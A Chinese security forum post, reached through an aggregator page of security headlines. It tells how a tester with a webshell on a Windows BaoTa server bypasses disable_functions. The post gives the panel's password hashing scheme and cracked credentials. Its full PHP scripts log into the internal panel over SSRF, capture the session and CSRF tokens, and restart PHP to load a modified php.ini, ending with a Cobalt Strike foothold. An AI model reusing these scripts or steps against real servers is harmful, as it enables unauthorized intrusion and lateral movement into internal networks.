Aggregator
从短信到短视频:黑流量为电诈犯罪引路
DDoS in Financial Services: What to Know and What to Do
How to Fight Video Piracy: Notes from a Real-Life Battle
SALT API安全最佳实践
安全工具 EasyPen alpha 1.0 发布
Nccgroup Pwn2Own 中攻破 Netgear R6700路由器的漏洞分析
Cyberterrorists Target Record Number of Victims with DDoS Attacks in Q2
走进区块链的第一步:钱包服务
玄-Bypass Windows Defender Dump Lsass(手法拙劣) - zha0gongz1
Akamai Named a 2022 Gartner� Magic Quadrant Leader for Cloud Web Application and API Protection
蓝凌oa安装及调试
Over Half of Global Firms' Supply Chains Compromised by Ransomware
React 为什么重新渲染
CVE-2022-29845~29847 WhatsUp Gold 多个漏洞组合链分析
teleport 堡垒机任意用户登录漏洞
c# 调用Windows API - nice_0e3
记一次绕过win下宝塔的disable_functions到cs上线
在一次渗透测试中,通过某个上传漏洞拿到了目标的shell
好家伙,禁了这么多函数
上一下哥斯拉的马看一下信息
win的服务器,还是system权限
目标服务器是宝塔,win下的宝塔一般都是system权限的
现在有几种思路:
1.想办法bypass disable_functions
2.替换php.ini
3.想办法替换宝塔的密码文件,登录宝塔
0x01:无法bypass disable_functions那就先从第一种思路开始
首先目标用的是apache:Apache/2.4.52 (Win64) OpenSSL/1.1.1m mod_fcgid/2.3.9a 是 php5.5.38
百度一下bypass disable_functions的方法:
1.利用Linux环境变量LD_PRELOAD --要linux,win不行
2.利用PHP7.4 FFI绕过 --php版本5.5.38
3.CVE-2014-6271 --要linux,win不行
3.利用imap_open()绕过 --无iamp扩展
3.利用Pcntl组件 --无组件
4.利用ImageMagick 漏洞绕过(CVE-2016–3714) --无php-imagick拓展
5.利用 Apache Mod CGI -- 要linux,win不行
6.利用攻击PHP-FPM --要linux,win不行
7.利用 GC UAF --要linux,win不行
8.利用 Json Serializer UAF --要linux,win不行
9.利用Backtrace UAF --要linux,win不行
10.利用iconv --要linux,win不行
11.利用Windows组件COM绕过 --目标disable_classes了com
0x02:替换php.ini失败网上找到了一个文章
我也试试,成功修改了
但是不知道为什么我等了24小时还是没有生效…………
有没有大佬知道这是怎么回事?
0x03:替换密码进入宝塔失败我登录了D:/BtSoft/panel/data/admin_path.pl 是保存路径的
/jinguangdasha
D:/BtSoft/panel/data/default.db
这个是宝塔的数据库下载一下
账号也是jinguangdasha,到这里我怀疑密码也是jinguangdasha
宝塔的加密方式: md5(md5(md5(password)+'_bt.cn')+salt)
jinguangdasha-->a5dd26d55a09d7ce7a510a824ee9ebba-->620b24a6d3d02afd8cb8aa3c868ba4b2-->f07c6c84d52346c4cf7c6b155a37b5b2
对的上说明宝塔面板:/jinguangdasha 账号:jinguangdasha 密码:jinguangdasha
这下都不用替换了
结果*@#@&*(脏话),宝塔面板在内网
0x04:PHP file_get_contents登录面板并重启面板灵光乍现,file_get_contents这个函数是调用php.exe执行操作,那如果get内网ip是不是可以获取到面板,如果构造登录获取到cookie去重启php服务是不是我修改的php.ini就生效了,就可以上cs了
<?php echo file_get_contents("内网面板地址/jinguangdasha/"); ?>说明这个思路是行得通的
经过分析,可以知道改了默认入口的宝塔先要访问一下 内网面板地址/jinguangdasha/ 然后http返回头会有一个Set-Cookie:xxx
获取到这个Set-Cookie值再去post登录才行,不然无法登录
<?php $url = "内网面板地址";//面板地址 $safety = "/jinguangdasha/";//面板入口 file_get_contents($url.$safety); $cookie = ""; foreach ($http_response_header as $header) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $header, $matches)) { $cookie = $matches[1]; } } echo $cookie; ?>返回结果:
宝塔登录的时候对账号密码进行了加密
构造包进行登录:
<?php $url = "内网面板地址";//面板地址 $safety = "/jinguangdasha/";//面板入口 file_get_contents($url.$safety); $cookie = ""; foreach ($http_response_header as $header) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $header, $matches)) { $cookie = $matches[1]; } } echo $cookie; define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true)); $header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."\r\n"."Cookie: ".$cookie."\r\n"; define('FORM_FIELD', 'uploaded_file'); $content = "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"username\"\r\n\r\n"."a5dd26d55a09d7ce7a510a824ee9ebba\r\n";//加密后的账号 $content .= "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"password\"\r\n\r\n"."620b24a6d3d02afd8cb8aa3c868ba4b2\r\n";//加密后的密码 $content .= "--".MULTIPART_BOUNDARY."--\r\n"; $context = stream_context_create(array( 'http' => array( 'method' => 'POST', 'header' => $header, 'content' => $content, ) )); $a = file_get_contents($url."/login", false, $context); echo $a."<br>"; ?>返回:SESSIONID=8fab8ee9-479d-4428-94ac-6acf20a81001.42vuXC45Eacp8au9rTFsTKRrr58{"status": true, "msg": "鐧诲綍鎴愬姛,姝e湪璺宠浆..."}
登录成功了,宝塔登录后会返回 request_token 和 SESSIONID ,我们带着这两个值进去看一下面板
<?php $url = "内网面板地址";//面板地址 $safety = "/jinguangdasha/";//面板入口 file_get_contents($url.$safety); $cookie = ""; foreach ($http_response_header as $header) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $header, $matches)) { $cookie = $matches[1]; } } echo $cookie; define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true)); $header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."\r\n"."Cookie: ".$cookie."\r\n"; define('FORM_FIELD', 'uploaded_file'); $content = "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"username\"\r\n\r\n"."a5dd26d55a09d7ce7a510a824ee9ebba\r\n";//加密后的账号 $content .= "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"password\"\r\n\r\n"."620b24a6d3d02afd8cb8aa3c868ba4b2\r\n";//加密后的密码 $content .= "--".MULTIPART_BOUNDARY."--\r\n"; $context = stream_context_create(array( 'http' => array( 'method' => 'POST', 'header' => $header, 'content' => $content, ) )); $a = file_get_contents($url."/login", false, $context); echo $a."<br>"; $cookies = array(); foreach ($http_response_header as $hdr) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $hdr, $matches)) { parse_str($matches[1], $tmp); $cookies += $tmp; } } $request_token = $cookies['request_token']; $key= $cookies['SESSIONID']; echo $request_token."@@".$key; $opts = array ( 'http' => array ( 'method' => 'GET', 'header'=> "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" . "Cookie:request_token=".$request_token."; SESSIONID=".$key." \r\n". "Pragma:no-cache\r\n", ) ); $context2 = stream_context_create($opts); $bb =file_get_contents($url."/soft",false,$context2); echo $bb; ?>宝塔的机制是防止csrf,GET虽然可以访问 ,但是POST无法正常访问,要带着一个由刚才GET得到的token才可以成功POST
现在构造post来重启面板的php服务
<?php $url = "内网面板地址";//面板地址 $safety = "/jinguangdasha/";//面板入口 file_get_contents($url.$safety); $cookie = ""; foreach ($http_response_header as $header) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $header, $matches)) { $cookie = $matches[1]; } } echo $cookie; define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true)); $header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."\r\n"."Cookie: ".$cookie."\r\n"; define('FORM_FIELD', 'uploaded_file'); $content = "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"username\"\r\n\r\n"."a5dd26d55a09d7ce7a510a824ee9ebba\r\n";//加密后的账号 $content .= "--".MULTIPART_BOUNDARY."\r\n"."Content-Disposition: form-data; name=\"password\"\r\n\r\n"."620b24a6d3d02afd8cb8aa3c868ba4b2\r\n";//加密后的密码 $content .= "--".MULTIPART_BOUNDARY."--\r\n"; $context = stream_context_create(array( 'http' => array( 'method' => 'POST', 'header' => $header, 'content' => $content, ) )); $a = file_get_contents($url."/login", false, $context); echo $a."<br>"; $cookies = array(); foreach ($http_response_header as $hdr) { if (preg_match('/^Set-Cookie:\s*([^;]+)/', $hdr, $matches)) { parse_str($matches[1], $tmp); $cookies += $tmp; } } $request_token = $cookies['request_token']; $key= $cookies['SESSIONID']; echo $request_token."@@".$key; $opts = array ( 'http' => array ( 'method' => 'GET', 'header'=> "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" . "Cookie:request_token=".$request_token."; SESSIONID=".$key." \r\n". "Pragma:no-cache\r\n", ) ); $context2 = stream_context_create($opts); $bb =file_get_contents($url."/soft",false,$context2); $bb2 = getSubstr($bb,'request_token_head','container-fluid'); $bb3 = substr($bb2,9,48); echo "@@".$bb3."<br>"; function getSubstr($str, $leftStr, $rightStr) { $left = strpos($str, $leftStr); $right = strpos($str, $rightStr,$left); if($left < 0 or $right < $left) return ''; return substr($str, $left + strlen($leftStr), $right-$left-strlen($leftStr)); } $data = array( 'name' => 'php-fpm-55',//php版本号 'type' => 'restart', ); $content666 = http_build_query($data); $content_length = strlen($content666); $options = array( 'http' => array( 'method' => 'POST', 'header' => "Content-type: application/x-www-form-urlencoded\r\n" . "Content-length: $content_length\r\n". "Cookie:request_token=".$request_token."; SESSIONID=".$key." \r\n". 'x-http-token:'.$bb3."\r\n". "x-cookie-token:".$request_token."\r\n", 'content' => $content666 ) ); echo file_get_contents($url."/system?action=ServiceAdmin", false, stream_context_create($options)); ?>
上线cs完成测试!!然后接下来就是内网渗透了…………
3 个帖子 - 3 位参与者